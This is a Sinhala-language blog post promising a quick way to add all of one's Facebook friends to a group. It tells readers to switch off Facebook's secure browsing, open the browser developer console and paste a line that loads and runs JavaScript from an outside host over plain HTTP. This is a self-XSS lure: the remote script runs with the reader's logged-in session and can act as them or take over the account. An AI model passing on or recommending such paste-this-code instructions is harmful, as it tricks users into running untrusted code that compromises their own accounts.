දන්නවනේ කොච්චර කට්ටක් කන්න ඔනිද කියලා යාලුවෝ Group වලට add කරන්න. 4n එකෙන් එක පාරකට 5යි නේ com එකෙන් නම් එක පාරකට 20ක් වගේනේ add කරන්න පුලුවන්. දැන් ඉතින් එච්චර කට්ටක් කන්න ඔනි නැහැ.
ඕනෑම කෙනෙකුට තමන්ගෙ සියලූම යහලුවන් එකවරම ඕනෑම ගෲප් එකකට එකතු කරගැනීමේ පහසුම ක්‍රමයක් මෙන්න.පහත පියවර කිහිපය අනුගමනය කරන්න.
මුලින්ම කරන්න ඕන ඔබේ ෆේස්බුක් ගිණුමෙ Secure Browsing OFF කරන එක. ඒක කරන්න නම් Facebook Account Settings >> Security Settings >> Secure Browsing වල ටික් එක ඉවත් කරලා Save කරන්න.
firefox වලින් නම්, යාළුවො ඇඩ් කරන්න ඕන ගෲප් එක ඔපන් කරල පේජ් එක සම්පූර්ණයෙන්ම ලෝඩ් උනාට පස්සෙ CTRL + SHIFT + K (ඒ කියන්නෙ CTRL, SHIFT, K කීස් තුනම එකවර) ප්‍රෙස් කරන්න. දැන් උඩින් එන බොක්ස් එකෙ පහලින්ම තියෙන කුඩා තීරුවේ පහල කෝඩ් එක පේස්ට් කරල එන්ටර් කරන්න.
chrome වලින් නම්, යාළුවො ඇඩ් කරන්න ඕන ගෲප් එක ඔපන් කරල පේජ් එක සම්පූර්ණයෙන්ම ලෝඩ් උනාට පස්සෙ Page එකේ ඔබ කැමති තැනක Right Click කරන්න. දැන් "Inspect Element" යන්න තෝරා ඉන් පසු "Console" තෝරන්න. පසුව පහත දී තිබෙන කෝඩ් එක Copy කර Paste කර එන්ටර් කරන්න.
document.body.appendChild(document.createElement('script')).src='http://rksk.ekhost.tk/java_scripts/autoinvite.js';
දැන් ඉතින් වැඩේ ගොඩ. ඕක ඉවරවෙන්න ටිකක් වෙලා යනව. ඒක ඉවර වෙනකල් වෙන tab එක ඔපන් කරගෙන වැඩ කරන්න.
සැ.යු: මෙම ක්‍රමය group adminලාට සිදු කල නොහැහි අතර, එසේ කිරිමට අවශ්‍යම නම් තාවකාලිකව admin තනතුරෙන් ඉවත් වී, මෙය සිදුකිරීමට පුළුවන.
මෙම ක්‍රමය use කරලා Q +A Group එකටත් යාලුවෝ add කරාට වරදක් නැහැ.
ආයෙත් මේ වගේ වැදගත් doc එකකින් හමුවෙමු.
෴ස්තුතියි.෴
0 comments:
Post a Comment
කරුණාකර ඔබගේ අදහස් මෙහි ලියා යන්න...